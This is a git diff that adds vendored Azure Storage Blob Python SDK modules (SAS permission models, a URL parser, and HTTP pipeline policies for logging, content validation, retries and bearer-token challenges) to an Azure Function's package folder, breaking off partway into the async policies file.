+ + :param bool service: + Access to service-level APIs (e.g., Get/Set Service Properties, + Get Service Stats, List Containers/Queues/Shares) + :param bool container: + Access to container-level APIs (e.g., Create/Delete Container, + Create/Delete Queue, Create/Delete Share, + List Blobs/Files and Directories) + :param bool object: + Access to object-level APIs for blobs, queue messages, and + files(e.g. Put Blob, Query Entity, Get Messages, Create File, etc.) + """ + + def __init__(self, service=False, container=False, object=False): # pylint: disable=redefined-builtin + self.service = service + self.container = container + self.object = object + self._str = (('s' if self.service else '') + + ('c' if self.container else '') + + ('o' if self.object else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, string): + """Create a ResourceTypes from a string. + + To specify service, container, or object you need only to + include the first letter of the word in the string. E.g. service and container, + you would provide a string "sc". + + :param str string: Specify service, container, or object in + in the string with the first letter of the word. + :return: A ResourceTypes object + :rtype: ~azure.storage.blob.ResourceTypes + """ + res_service = 's' in string + res_container = 'c' in string + res_object = 'o' in string + + parsed = cls(res_service, res_container, res_object) + parsed._str = string # pylint: disable = protected-access + return parsed + + +class AccountSasPermissions(object): + """ + :class:`~ResourceTypes` class to be used with generate_account_sas + function and for the AccessPolicies used with set_*_acl. There are two types of + SAS which may be used to grant resource access. One is to grant access to a + specific resource (resource-specific). Another is to grant access to the + entire service for a specific account and allow certain operations based on + perms found here. + + :param bool read: + Valid for all signed resources types (Service, Container, and Object). + Permits read permissions to the specified resource type. + :param bool write: + Valid for all signed resources types (Service, Container, and Object). + Permits write permissions to the specified resource type. + :param bool delete: + Valid for Container and Object resource types, except for queue messages. + :param bool delete_previous_version: + Delete the previous blob version for the versioning enabled storage account. + :param bool list: + Valid for Service and Container resource types only. + :param bool add: + Valid for the following Object resource types only: queue messages, and append blobs. + :param bool create: + Valid for the following Object resource types only: blobs and files. + Users can create new blobs or files, but may not overwrite existing + blobs or files. + :param bool update: + Valid for the following Object resource types only: queue messages. + :param bool process: + Valid for the following Object resource type only: queue messages. + :keyword bool tag: + To enable set or get tags on the blobs in the container. + :keyword bool filter_by_tags: + To enable get blobs by tags, this should be used together with list permission. + :keyword bool set_immutability_policy: + To enable operations related to set/delete immutability policy. + To get immutability policy, you just need read permission. + :keyword bool permanent_delete: + To enable permanent delete on the blob is permitted. + Valid for Object resource type of Blob only. 
+ """ + def __init__(self, read=False, write=False, delete=False, + list=False, # pylint: disable=redefined-builtin + add=False, create=False, update=False, process=False, delete_previous_version=False, **kwargs): + self.read = read + self.write = write + self.delete = delete + self.delete_previous_version = delete_previous_version + self.permanent_delete = kwargs.pop('permanent_delete', False) + self.list = list + self.add = add + self.create = create + self.update = update + self.process = process + self.tag = kwargs.pop('tag', False) + self.filter_by_tags = kwargs.pop('filter_by_tags', False) + self.set_immutability_policy = kwargs.pop('set_immutability_policy', False) + self._str = (('r' if self.read else '') + + ('w' if self.write else '') + + ('d' if self.delete else '') + + ('x' if self.delete_previous_version else '') + + ('y' if self.permanent_delete else '') + + ('l' if self.list else '') + + ('a' if self.add else '') + + ('c' if self.create else '') + + ('u' if self.update else '') + + ('p' if self.process else '') + + ('f' if self.filter_by_tags else '') + + ('t' if self.tag else '') + + ('i' if self.set_immutability_policy else '') + ) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, permission): + """Create AccountSasPermissions from a string. + + To specify read, write, delete, etc. permissions you need only to + include the first letter of the word in the string. E.g. for read and write + permissions you would provide a string "rw". + + :param str permission: Specify permissions in + the string with the first letter of the word. + :return: An AccountSasPermissions object + :rtype: ~azure.storage.blob.AccountSasPermissions + """ + p_read = 'r' in permission + p_write = 'w' in permission + p_delete = 'd' in permission + p_delete_previous_version = 'x' in permission + p_permanent_delete = 'y' in permission + p_list = 'l' in permission + p_add = 'a' in permission + p_create = 'c' in permission + p_update = 'u' in permission + p_process = 'p' in permission + p_tag = 't' in permission + p_filter_by_tags = 'f' in permission + p_set_immutability_policy = 'i' in permission + parsed = cls(read=p_read, write=p_write, delete=p_delete, delete_previous_version=p_delete_previous_version, + list=p_list, add=p_add, create=p_create, update=p_update, process=p_process, tag=p_tag, + filter_by_tags=p_filter_by_tags, set_immutability_policy=p_set_immutability_policy, + permanent_delete=p_permanent_delete) + + return parsed + + +class Services(object): + """Specifies the services accessible with the account SAS. + + :param bool blob: + Access for the `~azure.storage.blob.BlobServiceClient` + :param bool queue: + Access for the `~azure.storage.queue.QueueServiceClient` + :param bool fileshare: + Access for the `~azure.storage.fileshare.ShareServiceClient` + """ + + def __init__(self, blob=False, queue=False, fileshare=False): + self.blob = blob + self.queue = queue + self.fileshare = fileshare + self._str = (('b' if self.blob else '') + + ('q' if self.queue else '') + + ('f' if self.fileshare else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, string): + """Create Services from a string. + + To specify blob, queue, or file you need only to + include the first letter of the word in the string. E.g. for blob and queue + you would provide a string "bq". + + :param str string: Specify blob, queue, or file in + in the string with the first letter of the word. 
+ :return: A Services object + :rtype: ~azure.storage.blob.Services + """ + res_blob = 'b' in string + res_queue = 'q' in string + res_file = 'f' in string + + parsed = cls(res_blob, res_queue, res_file) + parsed._str = string # pylint: disable = protected-access + return parsed + + +class UserDelegationKey(object): + """ + Represents a user delegation key, provided to the user by Azure Storage + based on their Azure Active Directory access token. + + The fields are saved as simple strings since the user does not have to interact with this object; + to generate an identify SAS, the user can simply pass it to the right API. + + :ivar str signed_oid: + Object ID of this token. + :ivar str signed_tid: + Tenant ID of the tenant that issued this token. + :ivar str signed_start: + The datetime this token becomes valid. + :ivar str signed_expiry: + The datetime this token expires. + :ivar str signed_service: + What service this key is valid for. + :ivar str signed_version: + The version identifier of the REST service that created this token. + :ivar str value: + The user delegation key. + """ + def __init__(self): + self.signed_oid = None + self.signed_tid = None + self.signed_start = None + self.signed_expiry = None + self.signed_service = None + self.signed_version = None + self.value = None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/parser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/parser.py new file mode 100644 index 0000000..07ac93e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/parser.py @@ -0,0 +1,20 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import sys + +if sys.version_info < (3,): + def _str(value): + if isinstance(value, unicode): # pylint: disable=undefined-variable + return value.encode('utf-8') + + return str(value) +else: + _str = str + + +def _to_utc_datetime(value): + return value.strftime('%Y-%m-%dT%H:%M:%SZ') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies.py new file mode 100644 index 0000000..7f54e80 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies.py @@ -0,0 +1,657 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# --------------------------------------------------------------------------
+
+import base64
+import hashlib
+import re
+import random
+from time import time
+from io import SEEK_SET, UnsupportedOperation
+import logging
+import uuid
+from typing import Any, TYPE_CHECKING
+from wsgiref.handlers import format_date_time
+try:
+    from urllib.parse import (
+        urlparse,
+        parse_qsl,
+        urlunparse,
+        urlencode,
+    )
+except ImportError:
+    from urllib import urlencode  # type: ignore
+    from urlparse import (  # type: ignore
+        urlparse,
+        parse_qsl,
+        urlunparse,
+    )
+
+from azure.core.pipeline.policies import (
+    BearerTokenCredentialPolicy,
+    HeadersPolicy,
+    HTTPPolicy,
+    NetworkTraceLoggingPolicy,
+    RequestHistory,
+    SansIOHTTPPolicy,
+)
+from azure.core.exceptions import AzureError, ServiceRequestError, ServiceResponseError
+
+from .authentication import StorageHttpChallenge
+from .constants import DEFAULT_OAUTH_SCOPE, STORAGE_OAUTH_SCOPE
+from .models import LocationMode
+
+try:
+    _unicode_type = unicode  # type: ignore
+except NameError:
+    _unicode_type = str
+
+if TYPE_CHECKING:
+    from azure.core.credentials import TokenCredential
+    from azure.core.pipeline import PipelineRequest, PipelineResponse
+
+
+_LOGGER = logging.getLogger(__name__)
+
+
+def encode_base64(data):
+    if isinstance(data, _unicode_type):
+        data = data.encode('utf-8')
+    encoded = base64.b64encode(data)
+    return encoded.decode('utf-8')
+
+
+def is_exhausted(settings):
+    """Are we out of retries?"""
+    retry_counts = (settings['total'], settings['connect'], settings['read'], settings['status'])
+    retry_counts = list(filter(None, retry_counts))
+    if not retry_counts:
+        return False
+    return min(retry_counts) < 0
+
+
+def retry_hook(settings, **kwargs):
+    if settings['hook']:
+        settings['hook'](retry_count=settings['count'] - 1, location_mode=settings['mode'], **kwargs)
+
+
+def is_retry(response, mode):  # pylint: disable=too-many-return-statements
+    """Is this method/status code retryable? (Based on allowlists and control
+    variables such as the number of total retries to allow, whether to
+    respect the Retry-After header, whether this header is present, and
+    whether the returned status code is on the list of status codes to
+    be retried upon on the presence of the aforementioned header)
+    """
+    status = response.http_response.status_code
+    if 300 <= status < 500:
+        # An exception occurred, but in most cases it was expected. Examples could
+        # include a 409 Conflict or 412 Precondition Failed.
+        if status == 404 and mode == LocationMode.SECONDARY:
+            # Response code 404 should be retried if secondary was used.
+            return True
+        if status == 408:
+            # Response code 408 is a timeout and should be retried.
+            return True
+        return False
+    if status >= 500:
+        # Response codes above 500 with the exception of 501 Not Implemented and
+        # 505 Version Not Supported indicate a server issue and should be retried.
+ if status in [501, 505]: + return False + return True + # retry if invalid content md5 + if response.context.get('validate_content', False) and response.http_response.headers.get('content-md5'): + computed_md5 = response.http_request.headers.get('content-md5', None) or \ + encode_base64(StorageContentValidation.get_content_md5(response.http_response.body())) + if response.http_response.headers['content-md5'] != computed_md5: + return True + return False + + +def urljoin(base_url, stub_url): + parsed = urlparse(base_url) + parsed = parsed._replace(path=parsed.path + '/' + stub_url) + return parsed.geturl() + + +class QueueMessagePolicy(SansIOHTTPPolicy): + + def on_request(self, request): + message_id = request.context.options.pop('queue_message_id', None) + if message_id: + request.http_request.url = urljoin( + request.http_request.url, + message_id) + + +class StorageHeadersPolicy(HeadersPolicy): + request_id_header_name = 'x-ms-client-request-id' + + def on_request(self, request): + # type: (PipelineRequest, Any) -> None + super(StorageHeadersPolicy, self).on_request(request) + current_time = format_date_time(time()) + request.http_request.headers['x-ms-date'] = current_time + + custom_id = request.context.options.pop('client_request_id', None) + request.http_request.headers['x-ms-client-request-id'] = custom_id or str(uuid.uuid1()) + + # def on_response(self, request, response): + # # raise exception if the echoed client request id from the service is not identical to the one we sent + # if self.request_id_header_name in response.http_response.headers: + + # client_request_id = request.http_request.headers.get(self.request_id_header_name) + + # if response.http_response.headers[self.request_id_header_name] != client_request_id: + # raise AzureError( + # "Echoed client request ID: {} does not match sent client request ID: {}. " + # "Service request ID: {}".format( + # response.http_response.headers[self.request_id_header_name], client_request_id, + # response.http_response.headers['x-ms-request-id']), + # response=response.http_response + # ) + + +class StorageHosts(SansIOHTTPPolicy): + + def __init__(self, hosts=None, **kwargs): # pylint: disable=unused-argument + self.hosts = hosts + super(StorageHosts, self).__init__() + + def on_request(self, request): + # type: (PipelineRequest, Any) -> None + request.context.options['hosts'] = self.hosts + parsed_url = urlparse(request.http_request.url) + + # Detect what location mode we're currently requesting with + location_mode = LocationMode.PRIMARY + for key, value in self.hosts.items(): + if parsed_url.netloc == value: + location_mode = key + + # See if a specific location mode has been specified, and if so, redirect + use_location = request.context.options.pop('use_location', None) + if use_location: + # Lock retries to the specific location + request.context.options['retry_to_secondary'] = False + if use_location not in self.hosts: + raise ValueError("Attempting to use undefined host location {}".format(use_location)) + if use_location != location_mode: + # Update request URL to use the specified location + updated = parsed_url._replace(netloc=self.hosts[use_location]) + request.http_request.url = updated.geturl() + location_mode = use_location + + request.context.options['location_mode'] = location_mode + + +class StorageLoggingPolicy(NetworkTraceLoggingPolicy): + """A policy that logs HTTP request and response to the DEBUG logger. 
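The `StorageLoggingPolicy` defined next only emits when DEBUG logging is enabled. A sketch of turning it on from user code, assuming the `logging_enable`/`logging_body` keyword arguments that the policy pops from the request options are accepted at both client and operation level:

```python
import logging
import sys

from azure.storage.blob import BlobServiceClient

# The SDK loggers are plain stdlib loggers; DEBUG must be enabled for the
# policy to emit anything.
logger = logging.getLogger("azure.storage.blob")
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler(stream=sys.stdout))

service = BlobServiceClient(
    "https://myaccount.blob.core.windows.net",  # hypothetical account URL
    credential="<account-key>",                 # placeholder
    logging_enable=True,                        # headers logged, SAS/auth redacted
)

# Per-operation override, additionally logging request/response bodies:
container = service.get_container_client("mycontainer")
container.get_container_properties(logging_enable=True, logging_body=True)
```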
+class StorageLoggingPolicy(NetworkTraceLoggingPolicy):
+    """A policy that logs HTTP requests and responses to the DEBUG logger.
+
+    This accepts both global configuration (``logging_enable`` on the client)
+    and a per-request override via the same keyword argument.
+    """
+    def __init__(self, logging_enable=False, **kwargs):
+        self.logging_body = kwargs.pop("logging_body", False)
+        super(StorageLoggingPolicy, self).__init__(logging_enable=logging_enable, **kwargs)
+
+    def on_request(self, request):
+        # type: (PipelineRequest, Any) -> None
+        http_request = request.http_request
+        options = request.context.options
+        self.logging_body = self.logging_body or options.pop("logging_body", False)
+        if options.pop("logging_enable", self.enable_http_logger):
+            request.context["logging_enable"] = True
+            if not _LOGGER.isEnabledFor(logging.DEBUG):
+                return
+
+            try:
+                log_url = http_request.url
+                query_params = http_request.query
+                if 'sig' in query_params:
+                    # Redact the SAS signature value but keep the parameter name.
+                    log_url = log_url.replace(query_params['sig'], "*****")
+                _LOGGER.debug("Request URL: %r", log_url)
+                _LOGGER.debug("Request method: %r", http_request.method)
+                _LOGGER.debug("Request headers:")
+                for header, value in http_request.headers.items():
+                    if header.lower() == 'authorization':
+                        value = '*****'
+                    elif header.lower() == 'x-ms-copy-source' and 'sig' in value:
+                        # take the url apart and scrub away the signed signature
+                        scheme, netloc, path, params, query, fragment = urlparse(value)
+                        parsed_qs = dict(parse_qsl(query))
+                        parsed_qs['sig'] = '*****'
+
+                        # the SAS needs to be put back together
+                        value = urlunparse((scheme, netloc, path, params, urlencode(parsed_qs), fragment))
+
+                    _LOGGER.debug("    %r: %r", header, value)
+                _LOGGER.debug("Request body:")
+
+                if self.logging_body:
+                    _LOGGER.debug(str(http_request.body))
+                else:
+                    # We don't want to log the binary data of a file upload.
+                    _LOGGER.debug("Hidden body, please use logging_body to show body")
+            except Exception as err:  # pylint: disable=broad-except
+                _LOGGER.debug("Failed to log request: %r", err)
+
+    def on_response(self, request, response):
+        # type: (PipelineRequest, PipelineResponse, Any) -> None
+        if response.context.pop("logging_enable", self.enable_http_logger):
+            if not _LOGGER.isEnabledFor(logging.DEBUG):
+                return
+
+            try:
+                _LOGGER.debug("Response status: %r", response.http_response.status_code)
+                _LOGGER.debug("Response headers:")
+                for res_header, value in response.http_response.headers.items():
+                    _LOGGER.debug("    %r: %r", res_header, value)
+
+                # We don't want to log binary data if the response is a file.
+ _LOGGER.debug("Response content:") + pattern = re.compile(r'attachment; ?filename=["\w.]+', re.IGNORECASE) + header = response.http_response.headers.get('content-disposition') + resp_content_type = response.http_response.headers.get("content-type", "") + + if header and pattern.match(header): + filename = header.partition('=')[2] + _LOGGER.debug("File attachments: %s", filename) + elif resp_content_type.endswith("octet-stream"): + _LOGGER.debug("Body contains binary data.") + elif resp_content_type.startswith("image"): + _LOGGER.debug("Body contains image data.") + + if self.logging_body and resp_content_type.startswith("text"): + _LOGGER.debug(response.http_response.text()) + elif self.logging_body: + try: + _LOGGER.debug(response.http_response.body()) + except ValueError: + _LOGGER.debug("Body is streamable") + + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log response: %s", repr(err)) + + +class StorageRequestHook(SansIOHTTPPolicy): + + def __init__(self, **kwargs): # pylint: disable=unused-argument + self._request_callback = kwargs.get('raw_request_hook') + super(StorageRequestHook, self).__init__() + + def on_request(self, request): + # type: (PipelineRequest, **Any) -> PipelineResponse + request_callback = request.context.options.pop('raw_request_hook', self._request_callback) + if request_callback: + request_callback(request) + + +class StorageResponseHook(HTTPPolicy): + + def __init__(self, **kwargs): # pylint: disable=unused-argument + self._response_callback = kwargs.get('raw_response_hook') + super(StorageResponseHook, self).__init__() + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + # Values could be 0 + data_stream_total = request.context.get('data_stream_total') + if data_stream_total is None: + data_stream_total = request.context.options.pop('data_stream_total', None) + download_stream_current = request.context.get('download_stream_current') + if download_stream_current is None: + download_stream_current = request.context.options.pop('download_stream_current', None) + upload_stream_current = request.context.get('upload_stream_current') + if upload_stream_current is None: + upload_stream_current = request.context.options.pop('upload_stream_current', None) + + response_callback = request.context.get('response_callback') or \ + request.context.options.pop('raw_response_hook', self._response_callback) + + response = self.next.send(request) + + will_retry = is_retry(response, request.context.options.get('mode')) + # Auth error could come from Bearer challenge, in which case this request will be made again + is_auth_error = response.http_response.status_code == 401 + should_update_counts = not (will_retry or is_auth_error) + + if should_update_counts and download_stream_current is not None: + download_stream_current += int(response.http_response.headers.get('Content-Length', 0)) + if data_stream_total is None: + content_range = response.http_response.headers.get('Content-Range') + if content_range: + data_stream_total = int(content_range.split(' ', 1)[1].split('/', 1)[1]) + else: + data_stream_total = download_stream_current + elif should_update_counts and upload_stream_current is not None: + upload_stream_current += int(response.http_request.headers.get('Content-Length', 0)) + for pipeline_obj in [request, response]: + pipeline_obj.context['data_stream_total'] = data_stream_total + pipeline_obj.context['download_stream_current'] = download_stream_current + pipeline_obj.context['upload_stream_current'] = 
upload_stream_current
+        if response_callback:
+            response_callback(response)
+            request.context['response_callback'] = response_callback
+        return response
+
+
+class StorageContentValidation(SansIOHTTPPolicy):
+    """A policy that calculates and validates Content-MD5 hashes.
+
+    On upload it computes the MD5 of the outgoing body and sets the
+    'Content-MD5' header; on download it verifies the 'content-md5' header
+    returned by the service against the received body.
+    """
+    header_name = 'Content-MD5'
+
+    def __init__(self, **kwargs):  # pylint: disable=unused-argument
+        super(StorageContentValidation, self).__init__()
+
+    @staticmethod
+    def get_content_md5(data):
+        md5 = hashlib.md5()  # nosec
+        if isinstance(data, bytes):
+            md5.update(data)
+        elif hasattr(data, 'read'):
+            pos = 0
+            try:
+                pos = data.tell()
+            except:  # pylint: disable=bare-except
+                pass
+            for chunk in iter(lambda: data.read(4096), b""):
+                md5.update(chunk)
+            try:
+                data.seek(pos, SEEK_SET)
+            except (AttributeError, IOError):
+                raise ValueError("Data should be bytes or a seekable file-like object.")
+        else:
+            raise ValueError("Data should be bytes or a seekable file-like object.")
+
+        return md5.digest()
+
+    def on_request(self, request):
+        # type: (PipelineRequest, Any) -> None
+        validate_content = request.context.options.pop('validate_content', False)
+        if validate_content and request.http_request.method != 'GET':
+            computed_md5 = encode_base64(StorageContentValidation.get_content_md5(request.http_request.data))
+            request.http_request.headers[self.header_name] = computed_md5
+            request.context['validate_content_md5'] = computed_md5
+        request.context['validate_content'] = validate_content
+
+    def on_response(self, request, response):
+        if response.context.get('validate_content', False) and response.http_response.headers.get('content-md5'):
+            computed_md5 = request.context.get('validate_content_md5') or \
+                encode_base64(StorageContentValidation.get_content_md5(response.http_response.body()))
+            if response.http_response.headers['content-md5'] != computed_md5:
+                raise AzureError(
+                    'MD5 mismatch. Expected value is \'{0}\', computed value is \'{1}\'.'.format(
+                        response.http_response.headers['content-md5'], computed_md5),
+                    response=response.http_response
+                )
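End users reach this policy through the `validate_content` keyword on data-plane operations. A sketch, with the connection string and names as placeholders:

```python
from azure.storage.blob import BlobClient

blob = BlobClient.from_connection_string(
    "<connection-string>",  # placeholder
    container_name="mycontainer",
    blob_name="report.txt",
)

# on_request computes Content-MD5 for the outgoing body ...
blob.upload_blob(b"hello world", overwrite=True, validate_content=True)

# ... and on_response verifies the service's content-md5 header against the
# received bytes, raising AzureError on a mismatch (is_retry also treats an
# MD5 mismatch as retryable).
data = blob.download_blob(validate_content=True).readall()
```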
+ """ + if settings['hosts'] and all(settings['hosts'].values()): + url = urlparse(request.url) + # If there's more than one possible location, retry to the alternative + if settings['mode'] == LocationMode.PRIMARY: + settings['mode'] = LocationMode.SECONDARY + else: + settings['mode'] = LocationMode.PRIMARY + updated = url._replace(netloc=settings['hosts'].get(settings['mode'])) + request.url = updated.geturl() + + def configure_retries(self, request): # pylint: disable=no-self-use + body_position = None + if hasattr(request.http_request.body, 'read'): + try: + body_position = request.http_request.body.tell() + except (AttributeError, UnsupportedOperation): + # if body position cannot be obtained, then retries will not work + pass + options = request.context.options + return { + 'total': options.pop("retry_total", self.total_retries), + 'connect': options.pop("retry_connect", self.connect_retries), + 'read': options.pop("retry_read", self.read_retries), + 'status': options.pop("retry_status", self.status_retries), + 'retry_secondary': options.pop("retry_to_secondary", self.retry_to_secondary), + 'mode': options.pop("location_mode", LocationMode.PRIMARY), + 'hosts': options.pop("hosts", None), + 'hook': options.pop("retry_hook", None), + 'body_position': body_position, + 'count': 0, + 'history': [] + } + + def get_backoff_time(self, settings): # pylint: disable=unused-argument,no-self-use + """ Formula for computing the current backoff. + Should be calculated by child class. + + :rtype: float + """ + return 0 + + def sleep(self, settings, transport): + backoff = self.get_backoff_time(settings) + if not backoff or backoff < 0: + return + transport.sleep(backoff) + + def increment(self, settings, request, response=None, error=None): + """Increment the retry counters. + + :param response: A pipeline response object. + :param error: An error encountered during the request, or + None if the response was received successfully. + + :return: Whether the retry attempts are exhausted. + """ + settings['total'] -= 1 + + if error and isinstance(error, ServiceRequestError): + # Errors when we're fairly sure that the server did not receive the + # request, so it should be safe to retry. + settings['connect'] -= 1 + settings['history'].append(RequestHistory(request, error=error)) + + elif error and isinstance(error, ServiceResponseError): + # Errors that occur after the request has been started, so we should + # assume that the server began processing it. 
+            settings['read'] -= 1
+            settings['history'].append(RequestHistory(request, error=error))
+
+        else:
+            # Incrementing because of a server error like a 500 in
+            # status_forcelist and the given method is in the allowlist
+            if response:
+                settings['status'] -= 1
+                settings['history'].append(RequestHistory(request, http_response=response))
+
+        if not is_exhausted(settings):
+            if request.method not in ['PUT'] and settings['retry_secondary']:
+                self._set_next_host_location(settings, request)
+
+            # rewind the request body if it is a stream
+            if request.body and hasattr(request.body, 'read'):
+                # if no position was saved, the retry cannot be performed
+                if settings['body_position'] is None:
+                    return False
+                try:
+                    # attempt to rewind the body to the initial position
+                    request.body.seek(settings['body_position'], SEEK_SET)
+                except (UnsupportedOperation, ValueError):
+                    # if body is not seekable, then retry would not work
+                    return False
+            settings['count'] += 1
+            return True
+        return False
+
+    def send(self, request):
+        retries_remaining = True
+        response = None
+        retry_settings = self.configure_retries(request)
+        while retries_remaining:
+            try:
+                response = self.next.send(request)
+                if is_retry(response, retry_settings['mode']):
+                    retries_remaining = self.increment(
+                        retry_settings,
+                        request=request.http_request,
+                        response=response.http_response)
+                    if retries_remaining:
+                        retry_hook(
+                            retry_settings,
+                            request=request.http_request,
+                            response=response.http_response,
+                            error=None)
+                        self.sleep(retry_settings, request.context.transport)
+                        continue
+                break
+            except AzureError as err:
+                retries_remaining = self.increment(
+                    retry_settings, request=request.http_request, error=err)
+                if retries_remaining:
+                    retry_hook(
+                        retry_settings,
+                        request=request.http_request,
+                        response=None,
+                        error=err)
+                    self.sleep(retry_settings, request.context.transport)
+                    continue
+                raise err
+        if retry_settings['history']:
+            response.context['history'] = retry_settings['history']
+        response.http_response.location_mode = retry_settings['mode']
+        return response
+
+
+class ExponentialRetry(StorageRetryPolicy):
+    """Exponential retry."""
+
+    def __init__(self, initial_backoff=15, increment_base=3, retry_total=3,
+                 retry_to_secondary=False, random_jitter_range=3, **kwargs):
+        '''
+        Constructs an Exponential retry object. The initial_backoff is used for
+        the first retry. Subsequent retries are retried after initial_backoff +
+        increment_base^retry_count seconds.
+
+        :param int initial_backoff:
+            The initial backoff interval, in seconds, for the first retry.
+        :param int increment_base:
+            The base, in seconds, to increment the initial_backoff by after the
+            first retry.
+        :param int retry_total:
+            The maximum number of retry attempts.
+        :param bool retry_to_secondary:
+            Whether the request should be retried to secondary, if able. This should
+            only be enabled if RA-GRS accounts are used and potentially stale data
+            can be handled.
+        :param int random_jitter_range:
+            A number in seconds which indicates a range to jitter/randomize for the back-off interval.
+            For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3.
+        '''
+        self.initial_backoff = initial_backoff
+        self.increment_base = increment_base
+        self.random_jitter_range = random_jitter_range
+        super(ExponentialRetry, self).__init__(
+            retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs)
+
+    def get_backoff_time(self, settings):
+        """
+        Calculates how long to sleep before retrying.
+
+        :return:
+            A float indicating how long to wait before retrying the request,
+            or None to indicate no retry should be performed.
+        :rtype: float or None
+        """
+        random_generator = random.Random()
+        backoff = self.initial_backoff + (0 if settings['count'] == 0 else pow(self.increment_base, settings['count']))
+        random_range_start = backoff - self.random_jitter_range if backoff > self.random_jitter_range else 0
+        random_range_end = backoff + self.random_jitter_range
+        return random_generator.uniform(random_range_start, random_range_end)
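These retry classes are normally configured through client keyword arguments rather than instantiated directly. A sketch of both styles, with the account URL and key as placeholders:

```python
from azure.storage.blob import BlobServiceClient, ExponentialRetry

# Style 1: tune the default exponential policy via keyword arguments,
# which StorageRetryPolicy.__init__ pops from kwargs.
service = BlobServiceClient(
    "https://myaccount.blob.core.windows.net",
    credential="<account-key>",
    retry_total=5,
    retry_connect=2,
    retry_to_secondary=True,  # only sensible for RA-GRS accounts
)

# Style 2: pass a fully configured policy object.
policy = ExponentialRetry(initial_backoff=5, increment_base=2, retry_total=4)
service = BlobServiceClient(
    "https://myaccount.blob.core.windows.net",
    credential="<account-key>",
    retry_policy=policy,
)
```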
+
+
+class LinearRetry(StorageRetryPolicy):
+    """Linear retry."""
+
+    def __init__(self, backoff=15, retry_total=3, retry_to_secondary=False, random_jitter_range=3, **kwargs):
+        """
+        Constructs a Linear retry object.
+
+        :param int backoff:
+            The backoff interval, in seconds, between retries.
+        :param int retry_total:
+            The maximum number of retry attempts.
+        :param bool retry_to_secondary:
+            Whether the request should be retried to secondary, if able. This should
+            only be enabled if RA-GRS accounts are used and potentially stale data
+            can be handled.
+        :param int random_jitter_range:
+            A number in seconds which indicates a range to jitter/randomize for the back-off interval.
+            For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3.
+        """
+        self.backoff = backoff
+        self.random_jitter_range = random_jitter_range
+        super(LinearRetry, self).__init__(
+            retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs)
+
+    def get_backoff_time(self, settings):
+        """
+        Calculates how long to sleep before retrying.
+
+        :return:
+            A float indicating how long to wait before retrying the request,
+            or None to indicate no retry should be performed.
+        :rtype: float or None
+        """
+        random_generator = random.Random()
+        # the backoff interval normally does not change, however there is the possibility
+        # that it was modified by accessing the property directly after initializing the object
+        random_range_start = self.backoff - self.random_jitter_range \
+            if self.backoff > self.random_jitter_range else 0
+        random_range_end = self.backoff + self.random_jitter_range
+        return random_generator.uniform(random_range_start, random_range_end)
+
+
+class StorageBearerTokenCredentialPolicy(BearerTokenCredentialPolicy):
+    """ Custom Bearer token credential policy for following Storage Bearer challenges """
+
+    def __init__(self, credential, **kwargs):
+        # type: (TokenCredential, **Any) -> None
+        super(StorageBearerTokenCredentialPolicy, self).__init__(credential, STORAGE_OAUTH_SCOPE, **kwargs)
+
+    def on_challenge(self, request, response):
+        # type: (PipelineRequest, PipelineResponse) -> bool
+        try:
+            auth_header = response.http_response.headers.get("WWW-Authenticate")
+            challenge = StorageHttpChallenge(auth_header)
+        except ValueError:
+            return False
+
+        scope = challenge.resource_id + DEFAULT_OAUTH_SCOPE
+        self.authorize_request(request, scope, tenant_id=challenge.tenant_id)
+
+        return True
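The challenge policy above is what lets a client authorize with Azure AD transparently; from user code it is just a token credential. A sketch, with the account URL as a placeholder:

```python
from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

# Passing a TokenCredential wires StorageBearerTokenCredentialPolicy into the
# pipeline; if the service answers 401 with a WWW-Authenticate challenge,
# on_challenge re-scopes the token and the request is replayed.
service = BlobServiceClient(
    "https://myaccount.blob.core.windows.net",
    credential=DefaultAzureCredential(),
)
print(service.get_account_information())
```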
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies_async.py
new file mode 100644
index 0000000..fb957e9
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies_async.py
@@ -0,0 +1,253 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+# pylint: disable=invalid-overridden-method
+
+import asyncio
+import random
+import logging
+from typing import Any, TYPE_CHECKING
+
+from azure.core.pipeline.policies import AsyncBearerTokenCredentialPolicy, AsyncHTTPPolicy
+from azure.core.exceptions import AzureError
+
+from .authentication import StorageHttpChallenge
+from .constants import DEFAULT_OAUTH_SCOPE, STORAGE_OAUTH_SCOPE
+from .policies import is_retry, StorageRetryPolicy
+
+if TYPE_CHECKING:
+    from azure.core.credentials_async import AsyncTokenCredential
+    from azure.core.pipeline import PipelineRequest, PipelineResponse
+
+
+_LOGGER = logging.getLogger(__name__)
+
+
+async def retry_hook(settings, **kwargs):
+    if settings['hook']:
+        # iscoroutinefunction detects an 'async def' hook; iscoroutine would
